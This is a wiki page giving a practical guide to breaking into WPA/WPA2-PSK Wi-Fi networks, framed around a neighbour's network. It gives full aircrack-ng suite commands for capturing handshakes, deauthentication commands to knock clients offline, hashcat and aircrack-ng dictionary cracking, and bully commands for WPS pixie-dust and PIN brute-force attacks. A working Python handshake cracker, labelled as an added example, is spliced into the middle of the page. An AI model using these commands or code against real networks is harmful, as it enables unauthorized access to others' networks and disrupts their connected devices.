Breaking WPA2: Difference between revisions

From InstallGentoo Wiki v2
>Mrsnooze
(typos, flow)
>Grichka.bogdanoff
(wps attack vector, external links)

Latest revision as of 18:09, 17 May 2021

Breaking a WiFi network (WPA(2)-PSK) depends on the strength of the password. There are plenty of guides on breaking WEP/WPA/WPA2 on the net, but we'll repeat it all here anyway.

Requirements

  • A linux distro (possibly Kali) which you can boot into.
  • A WiFi Card/Dongle which supports Monitor Mode under linux.
  • Proximity to your target network - You'll need a bar or two of Wifi signal to have any fun.
  • aircrack-ng - preinstalled in Kali, available in most linux distros.

Basic process

The basic process of cracking someone's Wifi is:

  1. Find their network.
  2. Listen for a client to connect to the network.
  3. Crack the key.

Finding the network

Your standard WiFi connection software (netctl, wicd, etc) can tell you what networks are available. Alternatively you scan manually:

# iwconfig

Find your wifi card. We'll assume it's wlan0.

Turn on the wifi card/dongle

# ifconfig wlan0 up

List available wifi access points. You may want to pipe this command to less or a file.

# iwlist wlan0 scan

Look through the output of iwlist to see what networks are around, then take note of the network's channel and MAC address.

Listen to the Network

Once you have a target wifi and know its channel and MAC address:

# airmon-ng start wlan0 <channel>

This sets your wifi card to monitor mode and creates the wlan0mon interface which we'll use with the following programs:

# airodump-ng -c <channel> --bssid <mac of AP> -w prefix wlan0mon

The airodump-ng command dumps all the packets it hears into a file, given that

  • -c is the channel e.g. -c 11
  • --bssid is the MAC address of the wifi access point e.g. --bssid AA:AA:AA:AA:AA:AA
  • -w is a prefix for the files that airodump-ng will produce e.g. -w nextdoorneighbour
  • wlan0mon is the monitor device we created with airmon-ng start.

Wait for client authentication

At this point your Wifi card is listening to every packet sent on the target Wifi network. What we're looking for is the WPA 4-way authentication handshake: it never carries the password itself, but it carries values derived from it (a message integrity code keyed from the password and the SSID), which we can test candidate passwords against offline once we have it.

Once it happens, airodump-ng shows a "WPA handshake:" message in the top right of the terminal, and then we can stop listening. This is a client connecting to the target wifi.

Think about what kind of network your target is and when people would connect to it - 9am ready for work? 6pm home at last? When will a client connect? Alternatively, we can just kick off a client that's already connected...

Kicking Off a Client

If you're impatient, you can attempt to kick a client off the target wifi network. For this, you'll need a client to be connected to the network, and be physically close enough to that client to send some spoofed packets to it.

The output of airodump-ng will let you know if there are clients connected to your target network. Checking the <prefix>.kismet.netxml file will give you clues as to what kinds of devices are on the network. Kicking off an Apple device might get someone's attention. Kicking off an Epson printer probably won't.

To kick someone off their wifi network, send them a DEAUTH packet:

# aireplay-ng -0 1 -a <mac of AP> -c <mac of client> wlan0mon
  • -0 is to send the deauth packet
  • 1 is to send it once.
  • -a is the mac address of the access point
  • -c is the mac address of the client connected to the access point
  • wlan0mon is the interface created earlier

If you're close enough to the client device for them to hear you, this will kick them off the network. They will probably try to automatically reconnect. This gives us the handshake we're after.

The aireplay-ng command will let you know how many ACKs (acknowledgements of your packets) were received. If you get no acknowledgements, you're probably too far away from the network and need to get physically closer.

Cracking the handshake

With the handshake acquired, you can crack it. This is done offline and (unless you kicked someone off their Wifi) at this point all you have done is listen to the airwaves, which the target network cannot detect.

Cracking with aircrack-ng

To crack the handshake with aircrack-ng (cpu) run:

# aircrack-ng -w <wordlist> -b <mac of AP> prefix*.cap

Where

  • -w points to a wordlist/dictionary. Kali has several available, run a web search for more.
  • -b is the MAC address of the access point
  • prefix*.cap is a file we created with airodump-ng.

This will attempt to crack the handshake with the cpu. Quite slow. An i7 may get 4000 tries a second.
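What aircrack-ng (and hashcat's -m 2500 mode, below) actually compute for every guess, and why a CPU only manages a few thousand tries a second, as an added example that is not part of this wiki page: the SSID, MAC addresses, nonces, EAPOL frame and passphrase are constructed here, not taken from a real capture.

```python
import hashlib
import hmac

# --- constructed sample handshake (not a real capture) ---
SSID = b"nextdoorneighbour"
AP_MAC = bytes.fromhex("aaaaaaaaaaaa")     # the --bssid / -b value
STA_MAC = bytes.fromhex("bbbbbbbbbbbb")    # the client that (re)connected
ANONCE = bytes(range(32))                  # nonce the AP sends in message 1
SNONCE = bytes(range(32, 64))              # nonce the client sends in message 2

def pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations per candidate are what makes CPU cracking slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)

def kck(pmk_bytes: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key = first 16 bytes of the PTK, where
    PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    Only the first HMAC-SHA1 block of the PRF is needed to obtain the KCK."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + b + b"\x00", hashlib.sha1).digest()[:16]

def eapol_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (key info 0x010a: Pairwise + MIC, descriptor
    version 2 = HMAC-SHA1) with the MIC field zeroed, the form the MIC is computed over."""
    body = (b"\x02\x01\x0a\x00\x10" + b"\x00" * 7 + b"\x01" + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body

def mic(kck_bytes: bytes, eapol: bytes) -> bytes:
    # WPA2/CCMP: MIC = HMAC-SHA1(KCK, EAPOL frame with zeroed MIC) truncated to 16 bytes
    return hmac.new(kck_bytes, eapol, hashlib.sha1).digest()[:16]

def crack(handshake: dict, wordlist):
    """Dictionary attack as the crackers do it: derive PMK, KCK and MIC per candidate
    and compare with the MIC the client actually sent. Returns the passphrase or None."""
    for cand in wordlist:
        k = kck(pmk(cand, handshake["ssid"]), handshake["ap"], handshake["sta"],
                handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(mic(k, handshake["eapol"]), handshake["mic"]):
            return cand.decode()
    return None

# Build the "captured" message 2 under a constructed passphrase, as a real client would
_TRUE = b"correcthorse1"
_EAPOL = eapol_msg2(SNONCE)
CAPTURE = {"ssid": SSID, "ap": AP_MAC, "sta": STA_MAC, "anonce": ANONCE, "snonce": SNONCE,
           "eapol": _EAPOL, "mic": mic(kck(pmk(_TRUE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE), _EAPOL)}

WORDLIST = [b"password", b"12345678", b"correcthorse1", b"letmein123"]   # constructed wordlist

if __name__ == "__main__":
    print("recovered passphrase:", crack(CAPTURE, WORDLIST))
```

Time a loop over a few thousand candidates and you will see the PBKDF2 step dominate, which is exactly the cost a long random passphrase multiplies by the size of the search space.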

Cracking with cudaHashcat

cudaHashcat is a version of the hashcat password cracker which uses an nvidia GPU instead of a cpu. A gtx970 will get 160,000 tries a second. oclHashcat will use an AMD GPU. Hashcat uses a different file type than aircrack-ng (.hccap instead of .cap), so the first step is to convert your .cap file to the hashcat format:

# wpaclean cleanprefix.cap prefix.cap
# aircrack-ng -J hashcatprefix cleanprefix.cap

This will create hashcatprefix.hccap.

# cudaHashcat -m 2500 hashcatprefix.hccap wordlist
  • -m 2500 is for cracking WPA/WPA2 hashes.
  • hashcatprefix.hccap is the wpa handshake in hashcat format.
  • wordlist is the wordlist you're using to crack the password

There is also

# cudaHashcat -m 2500 hashcatprefix.hccap wordlist -r /opt/cudaHashcat/rules/best64.rule
  • Will apply the best64.rule rules file to your wordlist. Will take much longer but may give you success.

Attacking WPS

Wi-Fi Protected setup is a smart and easy protocol for connecting new devices to an AP.

Basically, there are two main connection modes: one that requires you to push a button on your router and one that doesn't.

The second one can be exploited to bruteforce your AP's WPA-PSK in hours, if your AP won't bother to WPS-lock itself after a few tries. There is also the pixie-wps exploit, which grants you the key in seconds on vulnerable devices (e.g. some ASUS or TP-LINK ones).

The basic attack algorithm

Two main tools exist for the job, the classic reaver and the newer, somewhat improved bully. The cool but lazy kids could also use an interactive script like airgeddon.

  1. Listen to the network (see "Listen to the Network" above).
  2. Kindly ask the target for the key:
    • # bully --essid Kremlin --pixiewps wlan0mon
  3. Bruteforce it if it won't comply:
    • # bully --essid Kremlin --bruteforce wlan0mon

Beware that you are not just listening for packets and then picking hashes offline peacefully. It is a direct attack and your MAC is visible to anybody curious enough. But you're only testing your home network, right?

Common Aircrack Problems

  1. airmon-ng start complains about processes that are using my wifi card.
    • Run # airmon-ng check kill
  2. airmon-ng complains about soft blocking/rfkill.
    • Run # rfkill unblock all

External links

The good stuff you should look into: https://www.aircrack-ng.org/doku.php?id=tutorial

The WPS question: https://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/